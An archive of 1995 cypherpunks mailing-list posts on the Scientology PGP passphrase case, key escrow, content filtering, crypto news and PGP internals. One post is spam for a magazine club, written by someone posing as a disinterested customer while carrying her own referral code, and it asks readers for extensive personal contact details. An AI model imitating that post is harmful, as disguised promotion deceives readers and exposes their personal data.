> If this is the file that the Co$ is trying to crack, then what the
> is being asked for is a pass phrase that can be handed to the Co$ that
> will pass the PGP valid key check and still not decrypt the data to
> anything usefull.

If this is the file the Co$ want to crack, they're a) clearly 
cryptographically inept, and b) the joke's clearly on them 8-).. Any 
hacker worthy of the name ought to get the passphrase within three 
attempts (I got it first time).

Note for paranoids: Of course, this message may just be a ruse to put 
the Co$ off the scent ;-)..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janetdove@infosat.com (Janet Dove)
Date: Sat, 9 Sep 95 02:58:51 PDT
Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles
Message-ID: <janetdove-0809951833220001@pm1-49.ixc.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi fellow 'netters,

My name is Janet Dove and I recently started using a magazine subscription
club in the USA that has a FREE 1 yr. magazine subscription deal with your
first paid order- and I have been very pleased with them.    They have
over 1,500 different USA titles that they can ship to any country on a
subscription basis.   As for computer magazines from the USA, they more of
a selection than I ever knew even existed.  They have magazines for most
every area of interest in their list of 1,500 titles.

Within the USA, for their USA members, they are cheaper than all their
competitors and even the publishers themselves.  This is their price
guarantee.

Overseas, on the average, they are generally around one-fourth to one-half
of what the newstands overseas charge locally for USA magazines.  On some
titles they are as little as one-tenth of what the newstands charge.  They
feel that mgazines should not be a luxury overseas.   In the USA, people
buy magazines and then toss them after reading them for just a few minutes
or hours.  They are so cheap in the USA!   Well, this company would like
to make it the same way for their overseas members.  They are also cheaper
than all their competitors in the USA and overseas, including the
publishers themselves!   This is their price guarantee.  Around one-half
their business comes from overseas, so they are very patient with new
members who only speak limited English as a 2nd language.

Their prices are so cheap because they deal direct with each publisher and
cut-out all the middlemen.


They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and
juicey) !)...if you completely fill out the form below.  It has lists of
all the freebies, lists of all the titles they sell, titles broken down by
categories and detailed descriptions on nearly 1000 of the titles that
they sell.

Please do not email me as I am just a happy customer and a *busy*
student.  I don't have time to even complete my thesis in time, let alone
run my part-time software business!  Email them directly at:      
munish@grfn.org



*------------cut here-----------------------------------------------*
REQUEST FOR MORE INFO:  please copy this section only and email to:
                                        munish@grfn.org

            (sorry, but incomplete forms *cannot* be acknowledged)

Name:
Internet email address:
Smail home address:
City-State-Zip:
Country:
Work Tel. #:
Work Fax #:
Home Tel. #:
Home Fax #:
Name of USA mags you currently get on the newstand or in the store:
Name of USA mags you currently get on a subscription basis, through the mail:
Name of USA mags you would like price quotes on when we call you:
Catalogue format desired from below 2 choices (list "1" or "2"):
(1. 22-part email message;    2.  atttached file by email)

{{{Note-  22-part email can be received by anyone with any computer.
Attached file format may not be for you:  it is sent as an uncompressed
400K file formatted in Microsoft World text only format, on a Mac;  if you
don't use Microsoft Word on a Mac - you will have to know how to convert
into a usable text format.  We cannot help you with this.   If in doubt,
we suggest you go with the universally acceptable 22-part email message. 
You can always manually spend a few minutes pasting the parts into one
whole.}}}

If you saw this on a newsgroup, which newsgroup did you see it on?:

How did you hear about us (name of person who referred you or the area of
the internet that you saw us mentioned in):   Janet Dove 
090895BGV
*------------cut here-----------------------------------------------*



They guarantee to beat all their competitors' prices. Sometimes they are
less than half of the next best deal I have been able to find and other
times, just a little cheaper - but I have never found a lower rate yet. 
They assured me that if I ever do, they will beat it.  

They have been very helpful and helped me change my address from the USA
to Finland and then back again when I moved last month.  They are very
knowledgeable about addressing mags worldwide.

They have a deal where you can get a free 1 yr. sub to a new magazine from
a special list of over 300 popular titles published in the USA.   They
will give you this free 1 yr. sub when you place your first paid order
with them to a renewal or new subscription to any of the over 1,500
different popular USA titles they sell.  

They can arrange delivery to virtually any country and I think they have
clients in around 35 or 36 countries now.  Outside the USA there is a
charge for foreign postage and handling (on both paid and freebie subs)
that varies from magazine to magazine.  I have found their staff to be
very friendly and courteous.  They even helped me with an address change
when I moved from one country to another.
 
The owner thinks of his service as a "club" and his clients as "members"
(even though there is no extra fee to become a member - your first
purchase automatically makes you a member) and he is real picky about who
he accepts as a new member.   When he sets you up as a new member, he
himself calls you personally on the phone to explain how he works his
deal, or sometimes he has one of his assistants call.  He is kind of
quirky sometimes - he insists on setting up new members by phone so he can
say hi to everyone (I sure wouldn't want to have his phone bills!),  but
you can place future orders (after your first order) via E-mail.   

He has some really friendly young ladies working for him, who seem to know
just as much as he does about this magazine stuff.  If you live overseas,
he will even call you there, as long as you are interested, but I think he
still makes all his overseas calls on the weekends, I guess cause the long
distance rates are cheaper then.  

He only likes to take new members from referrals from satisfied existing
members and he does virtually no advertising.  When I got set-up, they had
a 2-3 week waiting list for new members to be called back so that they
could join up. (Once you are an existing member, they help you immediately
when you call. )  I think they are able to get back to prospective new
members  the same day or within a few days now, as they have increased
their staff.  I am not sure about this.........but if you email the above
form to them, that is the way to get started!

They will send you some FREE info. via E-mail (the short version (around
40K) of their catalogue, or if you request it the DELUXE LONG VERSION
(around 400K-big and juicey) !)...if you fill out the form near the top of
this message.

They then send you email  that outlines how his club works and the list of
free choices that you can choose from, as well as the entire list of what
he sells;  and then they will give you a quick (3-5 minute) friendly,
no-pressure no-obligation call to explain everything to you personally and
answer all your questions.

Once you get in, you'll love them. I do.  For more info,  just fill out
the form near the top of this message and email it to:      
munish@grfn.org


Sincerely,

Janet Dove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 8 Sep 95 17:45:44 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081654.AA03407@ch1d157nwk>
Message-ID: <TuNUwkkAsKkR084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tonight's local news included an interesting blurb about this case.
The judge refused to order Wollersheim to disclose his passphrase,
since the encrypted material comprised names of Co$ critics
who could then be targeted by the Church.  And the secret (and
copyright!) $criptures were read in court and excerpts broadcast
on the news, "close-captioned for the hearing-impaired."

All the entertaining stuff some of us have been reading on the
net was there:  aliens transported to earth, volcanoes h-bombed,
thetans...I laughed my ass off.  A bigtime win for PGP and encryption
generally, and a major PR debacle for the $cienos.

Kute Korrespondences Koda:

Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers.
I was cleaning out some paperwork and disk file archives recently,
and noticed that the ViaCrypt and Austin Code Works subpoenas were
dated Sept. 9, 1993.  Grady Ward of ACW has, of course, been a
major Co$ antagonist, making good use of PGP and the Cypherpunks
remailers.  The old message I found detailing these subpoenas was
from this list's sometime visionary, L. Detweiler.

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If
GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd
WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT
Mkgv7cSClDM=
=Nuz5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 09:48:43 PDT
To: cypherpunks@toad.com
Subject: Info Warthogs
Message-ID: <199509081648.SAA08525@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Future Information Warfare Study Available


San Francisco, Sept. 6, 1995 -- Computer Security
Institute's "Special Report on Information Warfare"
describes how war might be fought in the 21st century.
The report will appear in the fall issue of the Computer
Security Journal, but is available now on request.


Patrice Rapalus, director of Computer Security Institute
(CSI), told Newsbytes, "In recent weeks, mass media
organizations such as Time Magazine, the Washington Post,
and National Public Radio have done stories on
information warfare. This report is a timely,
comprehensive and practical study on information warfare
and its impact on our future."


The report defines information warfare in contrast to
simple computer crime, "A computer crime is an act that
violates a law. It could be specifically targeted. It
could be isolated, or it could be one element of an
overall plan of attack. The conduct of information
warfare, in contrast, is never random or isolated (and
may not even violate a law). The term implies a concerted
effort to utilize information as a weapon with which to
wage war, whether on an actual battlefield or in
economic, political, or social arenas."


Four aspects of information warfare are listed in the
report: the electronic battlefield; infrastructure
attacks; industrial espionage; and personal privacy
attacks.


"It is important to understand that the term 'information
warfare' originated in the military and in its purest
sense refers to the grim and dangerous business of
real...country shattering war,"  says the report.


Computer Security Institute is located in San Francisco,
California, and is a wholly owned subsidiary of Miller
Freeman Publishing. Miller Freeman publishes over fifty
trade magazines including Dr. Dobbs Journal, Unix Review,
and LAN Magazine.


Computer Security Institute publishes, along with random
studies like the "Special Report on Information Warfare,"
a monthly newsletter, a semi-annual Journal, an annual
Buyers Guide, and a on-line bulletin board.


To obtain an advance copy of "Special Report on
Information Warfare," call 415-905-2310.

------


"Snooper" Software Digs Into Computers


San Francisco, Sept. 6, 1995 -- Vias & Associates Inc.
said it has introduced a new version of its "Snooper"
system information utility. The author of the software
said it is called Snooper because the program "snoops"
around the computer to report its configuration and
operating characteristics.


John Vias of Vias & Associates said his
company's program goes farther than other system
information programs, including Microsoft's MSD
(Microsoft System Detection), which is included in higher
versions of the company's DOS operating systems. "I think
Snooper is about the most accurate system information
utility you can get," he said. "People say it's easy to
use. It takes just one keystroke to go from the main
screen to any other screen. It also has a built-in editor
for 'autoexec' and 'config' files."


In all, Snooper can detect more than 150 details about a
person's computer, including CMOS settings, hard drive
type and capacity, any installed Micro Channel cards,
fax-modems, memory types and amount available to the
user, and video memory and type.


Snooper is targeted to all markets, Vias officials said,
including the average user, network administrators,
consultants, and technicians.


In the provided documentation is a wish list regarding
new features for future versions of Snooper, including
brand detection of additional non-Intel central
processing units (CPUs), detection of local bus cards and
tapes, and the ability to differentiate among different
types of hard drives.


Although Snooper can run in either DOS or Windows, Vias
said the program works best in the DOS environment. In
Windows, some of the software's reports must be disabled.
In addition, some of the test results may be in error or
unpredictable. Snooper requires an IBM PC or 100%
compatible machine, with at least 256 kilobytes (KB) of
RAM, a DOS with version 3.1 or higher, and some kind of
video card. Snooper retails for around $39, and is
available as both a full version and as shareware.


Vias also said he is working hard on a Windows 95 version
of Snooper. When tested the software on a Windows 95
machine running in DOS mode, no problems were
experienced. But running it in Windows mode made the
program very unpredictable.


-------


UK - PCMCIA Encryption Card Introduced


London, Sept. 5, 1995 -- PPCP, a PCMCIA (Personal
Computer Memory Card International Association)
specialist, has begun shipping the Session Key, a PCMCIA
Type II card from SCI Canada.


According to John Nolan, the company's managing director,
the card allows users to encrypt data on their PC hard
disk, as well as across serial port linked devices, such
as modems, using the DES algorithm. DES stands for Data
Encryption Standard, a US-originated high security
encryption system that is virtually unbreakable.


According to Nolan, the Session Key allows users to
protect their data on a selective basis. "Many of the
competing systems out there are only capable of
encrypting the user's entire hard disk. That obviously
protects the user's data, but if you forget your
password, you have serious problems," he explained.


"With the Session Key card, you create a new drive, the
'D' drive, to store the encrypted data. The card also
allows data to be transmitted by modem in DES format.
That allows a user maximum flexibility," he said.


When used to encrypt data on a user's hard disk, once the
Session Key is removed from the PCMCIA slot, all data on
the disk that is encrypted is protected against
unauthorized access. The encrypted data cannot be read or
used without reinserting the UKP349 card.


Nolan said that SCI has developed a second-generation
version of the Session Key, which will be available later
this year. "That version will use RSA encryption
techniques, as well Triple DES and a whole host of other
encryption systems," he said.


One of the problems with encryption devices like the
Session Key is the fact that the US Government currently
bans the export of certain types of encryption
technologies, as well as restricts the sale of many
technologies to "known parties."


According to Nolan, this approval system can cause the
company a few administrative problems. "We need to find
out who is the actual end-user and pass their details
back to SCI. My understanding is that the vetting is then
carried out at a government level in Canada or the US,"
he said. He added that, apart from a short delay,
typically a week or so before the card can be shipped to
the customer, there is usually no problem.


Reader Contact: PPCP, tel +44-181-893-2277, fax
+44-181-893-1182, Internet e-mail
100302.1470@compuserve.com/PPCP950905/PHOTO)

------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Fri, 8 Sep 95 10:02:18 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <v01510101ac75129c8e67@[193.74.217.3]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis Wrote:
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know,
>however, if the "dislike" is because government would have access under
>any circumstances or if the primary worry is that government will cheat
>and get access when most would agree that they shouldn't (either by the
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of
>non-LEA members of this list, would the escrow be acceptable??
>

Looking at it simply as a cryptosystem, I'd have to vote no, since the
security of the system can be "easily" (in a cryptographic sense)
compromised.

I feel safer knowing my privacy is protected by the laws of mathematics,
instead of the laws of the USA.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBME9jIs3xoLPBSgtxAQEndAf/V9hJEyMIHe6/h2UmEWT4KH81Y/HuBHZr
kuiHIRNFRGgsYKFIk72YGBltZvbPeWcX15RmGB6DO+91ecfmRMplW14RYAQyPpcx
AGC3rQ966hZ/mRHRi7Ygtw1tbRKgbDAaNzx468TRZGwl2LxexpbxzOZoy2kMR18M
+Kj6sLahlQxyTO6jx26uoj5uqmfdnxFAfjUDWAjLyhjH5x7XzqpJHQHKSFGIsdKY
X1tw7IPPDUElXJkdx0aVMhOFwEen3XGm3qrx/kJRmnG7Q9WoAHE5xqOLSAHyYImd
PaUT63Uzgop7euL4FROHqrIrlh70IPiWCk7t7OEwT8CS3MbbL/WgjQ==
=hYy7
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 8 Sep 95 16:24:58 PDT
To: cypherpunks@toad.com
Subject: [NOISE]Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <199509082321.TAA28363@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

>	Whatever do the workings of an hypothetical "libertarian"
>society have to do with the "Libertarian Party"?  Certainly, it would
>be nice if the latter were working towards the former, but the two are
>not the same.

So? (They are as close as we are going to get.)

>	I know of quite a few `l'ibertarians who strongly object to
>the `L'ibertarian Party pledge.

They were in the minority in my party, even *before* the OK City
mass-murder proved why we have such a pledge (to distance ourselves
from those who would initiate violence).
This reply, to a reply to the ENTIRE list, would probably have been
better sent privately. The reason that I first sent to the whole
list was as much to encourage other posters to proofread their posts
as for any libertarian political purpose.
<Wishing that this thread would end>

PS
Interesting letter to the editor RE: Jerry Garcia in today's WSJ.<g>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMFDPzG1lp8bpvW01AQGXRwP9Hxzigw1OCcL1L1u3jSlUvAMtzVPhDkwd
99czrw9jqSXfMhdouGNP3IwjZLXhF0AlmV+chMmMC7Z0xy/Qjznhgut8jIS7IpQN
KsXLVwWLCWk0U8nN27WuHVQoImfIG2ONLUUaM36pg1GGFTdQLiJauif2ZYDL6JSJ
+E1v7dmnLMc=
=xrhl
-----END PGP SIGNATURE-----
Regards, Jim Ray

"As sensitive and broad-minded humans, we must never allow ourselves to
be in any way judgmental of the religious practices of other people,
even when these people clearly are raving space loons." -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Fri, 8 Sep 95 20:09:14 PDT
To: cypherpunks@toad.com
Subject: Re: Libertarian Party and Crypto Anarchy
Message-ID: <v01510102ac76b2730ba2@[198.59.115.132]>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote,
>And David Friedman (author
>of "The Machinery of Freedom," and son of Milton) gave a talk recently in
>L.A. entitled "Crypto Anarchy and the State."

Is text available for that talk?

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 8 Sep 95 21:55:45 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: GAK Hacks
In-Reply-To: <199509081611.JAA05733@jobe.shell.portal.com>
Message-ID: <199509090450.VAA19757@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> One would be to create a patcher which would let you change the set of
> certificate authorities accepted by the browser.  Currently the browser
> accepts at least one (an internal Netscape test CA) which is not needed
> by end users.  Maybe its public key could be statically overwritten by
> the patch program with the public key of the replacement CA.  This sounds
> simple and safe.  The patch program can confirm that the data being
> changed matches the test CA.

	Where is the public key for the test CA available? Seems
pretty trivial to take those bits and just do a bit compare against
your netscape binary to find out where the key is stored within the
binary.. 

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Fri, 8 Sep 95 21:07:44 PDT
To: cypherpunks@toad.com
Subject: Re: Web Exon A-rate
Message-ID: <v01510103ac76b61be743@[198.59.115.132]>
MIME-Version: 1.0
Content-Type: text/plain


Somebody passed this along:
>WS Journal, Sept. 8, 1995.
>
>Cleaning the Web: Companies to Seek Pornography Blocker
>
>Array of Technology Firms Will Join in Effort to Let
>Parents Screen the Internet
>
>By Jared Sandberg
[snip]

This is a good idea.  And maybe cryptography can get involved--see below.

As a parent it is my responsibility to control what comes into the house
and to determine what limited view of the net my kids see.  The screening
software to do this could be in my home or part of a service of my service
provider.

A few companies have some simple products for doing this.  Most are
discouraged by threats from congress to reduce the market need.  Most
products use a simple red list to block access according to literature sent
me.  Some look for key words.

Normally, I would say that it is very premature for standards work.  It
would be good to see more ideas tried.  The Exon threats probably do not
allow this, so I see this news as a good thing.

One place to start is the web.

Depending on the kid's age and other factors I would want to have different
limitations on what the kid sees.  Older kids might just get warnings.  I
would like--for the little ones--to limit the view to some combination of
sites listed on green lists.  The view for slightly older kids might use
red lists to exclude sites instead.  (I really would want to create some
logical combination of lists for each kid.)  Organizations can compete for
the list market.  I might use these in what ever combination I like and
also add my own.  It is important to note that the kinds of things I would
like to screen out or in might be different from what the next person would
like to screen out or in.  (I put little faith in content screening.)

The problem might be in getting huge lists every week.  And pages that
seemed fine once could have changed.  Current red list subscriptions are
expensive--it is easier to keep kids off the computer.

>>>>>> the part that mentions cryptography >>>>>
As an alternative to green lists consumer organizations and do-gooder
organizations might certify pages.  These might be virtual green lists.
Each web page would have the cert built in--perhaps in comments to allow
most viewers to work.  Instead of checking a list in this case, the
screening software would ask the page to verify itself.

If the cert was PGP based, then every home doing this would have to have
PGP.  The screening product could use PGP.  Perhaps PGP would be slow.
There might be some way to check signatures that is faster and does not
have patent limitations.  It would be nice if it was possible for the
browser to see the first screenful without waiting for the screener to see
the entire page.

Only those that especially want to make their sites available to kids of
picky parents would get the pages certified.  Maybe just sending in e$3
would do it.  Or e$50 to get to the head of the list.

In whatever standards that come about, it is important that only those
involved in the screening process pay the price ($, delays).  Everybody
else should be able to carry on.

I do worry that some quick standards would be put into place and that
innovation in this area would then become arrested.

Dar


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael <mike@uac.net>
Date: Fri, 8 Sep 95 20:58:55 PDT
To: dl@hplyot.obspm.fr
Subject: Re: [NOISE/Fun] some 'special' primes
In-Reply-To: <9509090332.AA06578@hplyot.obspm.fr>
Message-ID: <199509090358.XAA18311@mail1.uac.net>
MIME-Version: 1.0
Content-Type: text/plain



> A bit more fun : German : 811 (dunno how to write it, but it starts
> with an "a")

acht hundert uenf  (I think)


--Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 9 Sep 95 00:44:52 PDT
To: cypherpunks@toad.com
Subject: Scientology/Wollersheim as test case for key disclosure
Message-ID: <199509090742.AA15129@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Andrew Loewenstern writes:

> > Modemac writes:
> >  Mr. Wollersheim has stated that he will go to jail before he reveals
> >  his encryption key.
> [...snip...]
> >  Call this one: BIG WIN FOR PGP!
> 
> Could this be it?  The test case for forced key disclosure?  The  
> Scientologists seem very determined and already have a grudge against  
> Wollersheim (according to a web page I saw Co$ owes him several million from  
> a settlement).  Has Co$ filed against Wollersheim over this yet?
> 
> If this does go to court and forcing Wollersheim to reveal the key becomes a  
> central issue, is this the test case "we" want?  Is this a "BIG WIN FOR PGP!"  
> or not?

Well, since it's (apparently) a civil case against Wollersheim, the 
potential Fifth Amendment self-incrimination issues may be murkier, so 
this may not be a good test case for the criminal context. In federal civil
trials, material reasonably likely to lead to the discovery of admissible
evidence is discoverable unless there's an applicable privilege - this
means that in a civil case, a defendant may be forced to hand over material
likely to expose them to liabilty. (The Fifth Amendment privilege against
criminal self-incrimination still applies).

I'm not sure that key disclosure will even be necessary - the Church
(or whatever annoying tentacle of it is suing Wollersheim) is entitled
to, for example, "a copy of . . . all documents, data compilations, and
tangible things in the possession, custody, or control of the party
that are relevant to disputed facts alleged with particularity in 
the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why
Wollersheim couldn't comply with the discovery rules by providing 
plaintext copies of all relevant information, unless for some reason
the passphrase is itself relevant.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFFFG33YhjZY3fMNAQGmLAP/S412cBRTRFRWou6mVjh7jbT9O3CIUPEB
oFuDLNy7pQR2ZaR5JOzSsCv9d96CpGdVjIWUxhP/Fz6tN3ZP7LuCXBssoIuiyuEp
z2e+LQthjcksUDqipR+QggIhN3hU66esg14WCF61yjwpXCukn13cOISYtBHRjc9g
sEiN0SXZ4tw=
=knU6
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 8 Sep 95 16:08:22 PDT
To: dsc@swcp.com (Dar Scott)
Subject: Re: Cyphernomicon
In-Reply-To: <v01510103ac6ed8b35fa2@[198.59.115.136]>
Message-ID: <9509082307.AA05637@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dar Scott writes:
[...]
 > Here is a summary of what I learned:
[...]
 >   FTP sites:
 >      ftp.netcom.com/pub/tc/tcmay/CP-FAQ
 >      The original.  "crowded"  (I couldn't open an FTP port.)

Got it from there, anyone feel free to fetch :
ftp://hplyot.obspm.fr/net/CP-FAQ.gz

 >      ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz
 >      ftp.goblin.punk.net/pub/docs/cypherfq.zip
 >      28.8 bps modem, newline=CR, but .zip will change to newline=CRLF
 >      About 432Kbytes.
 >      (On PPP@14.4 it took me 6+ minutes to get it.)
 >      "until someone posts it on a site with higher bandwidth"
hplyot's links to the world is 2mbit/s, feel free to fetch it from here...

 >   HTML sites:
 >      http://www.oberlin.edu/~brchkind/cyphernomicon/
 >      http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ
 >      text.  very responsive and fast (6 minutes for my 14.4 connection).
 >      http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
 >      text
 >      http://www.msen.com/~lwp/Cyphernomicon.gz
 >      About 432Kbytes.  Need g[un]zip utility.
(here, typing get CP-FAQ instead of get CP-FAQ.gz will gunzip it on
the fly, but you shall IMO get gzip for your system anyway :-)

hope this helps
regards
dl

- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFDMrXk52/beodHxAQFqnwQAjOY/nDOoUweYo5Xc7XjZPpRDFWqKuErp
nWgnmdrSeJPq8oyOeBtMZActfLoJFFtkcEWlooLasG+RCLhqaTA32nc75/Nv2A0s
ODQYj6Z2YhrzocDCKDtWegh5mNUEeWlIGnzRNSq/1lJV4cfLaHDzLoq+7ypt/epi
TDmOZMVXmLU=
=XKUy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@virgies.com
Date: Tue, 12 Sep 95 04:20:10 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <MAIL.34ED@virgies.com>
MIME-Version: 1.0
Content-Type: text/plain


The following message is being returned to its sender because the addressee
does not exist at destination <virgies.com>.

<---- Header information -------------------------------------------->
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
 altmail.holonet.net with ESMTP
       id BAA17972; Sat, 9 Sep 1995 01:50:44 -0700
Received: from toad.com by relay3.UU.NET with SMTP 
       id QQzgkp04297; Sat, 9 Sep 1995 04:49:08 -0400
Received: by toad.com id AA21380; Sat, 9 Sep 95 01:46:19 PDT
Received: from blob.best.net by toad.com id AA21371; Sat, 9 Sep 95 01:46:13
 PDT
Received: from miron.vip.best.com (daemon@miron.vip.best.com
 [204.156.129.176]) by blob.best.net (8.6.12/8.6.5) with ESMTP id BAA14766;
 Sat, 9 Sep 1995 01:46:04 -0700
Received: (from daemon@localhost) by miron.vip.best.com (8.6.12/8.6.12) id
 BAA01249; Sat, 9 Sep 1995 01:41:32 -0700
Date: Sat, 9 Sep 1995 01:41:32 -0700
Message-Id: <199509090841.BAA01249@miron.vip.best.com>
To: andrew_loewenstern@il.us.swissbank.com, cypherpunks@toad.com
Remailed-By: remail@extropia.wimsey.com
Comments: This message was anonymously remailed. Do not reply
        to the address in the from header, unless you wish to report
        a problem. Thank you.
From: cypherpunks@toad.com
References: <9509081654.AA03407@ch1d157nwk>
Subject: Re: Scientology tries to break PGP - and fails?
Sender: owner-cypherpunks@toad.com
Precedence: bulk

>
>Tom Rollins writes:
>>  If this is the file that the Co$ is trying to crack, then what the
>>  is being asked for is a pass phrase that can be handed to the Co$
>>  that will pass the PGP valid key check and still not decrypt the
>>  data to anything usefull.
>
>Well, I don't have the PGP 'conventional' encryption format memorized, but
>there is probably a constant after the IV that is prepended to the data.  The
>constant is used to determine if the key is correct.  Since the conventional
>encryption runs in CFB mode and there is a full block of random IV at the
>beginning of the file, it is extremely unlikely that a key could be found
>that would properly decrypt only the first two blocks while leaving the rest
>unreadable...
>
>>  If Larry Wollersheim does have the valid key.  It would be a simpler
>>  process to know what fake key to use and work it backwards through
>>  the MD5 to arrive at an ascii string to produce the fake key.
>
>Not really.  Even if you could find an IDEA key that would produce the
>desired output it would be hard to find a passphrase that would produce that
>key when hashed.  One of the properties of one-way hash functions is that it
>is difficult to find a plaintext that produces a given hash.  Hence the term
>'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,
>would require something like 2^64 operations), it would likely be long, have
>8-bit chars, and would be impossible to type in.  It would be tough to
>convince anyone that it was the real passphrase.
>
>
>andrew
>


There was a hack to pgp ui published a while back that would allow
someone decrypting a RSA encrypted file to print out the idea key.

Another feature of the hack allowed someone with the idea key to decrypt
an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
key directly.

Using this software should allow the reciever of an RSA PGP encrypted
file to allow someone else to decrypt it (by giving them the IDEA key)
without exposing the secret key. The IV block check will  allow them to
check that they are using the correct idea key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@toad.com
Date: Sat, 9 Sep 95 01:46:19 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081654.AA03407@ch1d157nwk>
Message-ID: <199509090841.BAA01249@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>Tom Rollins writes:
>>  If this is the file that the Co$ is trying to crack, then what the
>>  is being asked for is a pass phrase that can be handed to the Co$
>>  that will pass the PGP valid key check and still not decrypt the
>>  data to anything usefull.
>
>Well, I don't have the PGP 'conventional' encryption format memorized, but  
>there is probably a constant after the IV that is prepended to the data.  The  
>constant is used to determine if the key is correct.  Since the conventional  
>encryption runs in CFB mode and there is a full block of random IV at the  
>beginning of the file, it is extremely unlikely that a key could be found  
>that would properly decrypt only the first two blocks while leaving the rest  
>unreadable...
>
>>  If Larry Wollersheim does have the valid key.  It would be a simpler
>>  process to know what fake key to use and work it backwards through
>>  the MD5 to arrive at an ascii string to produce the fake key.
>
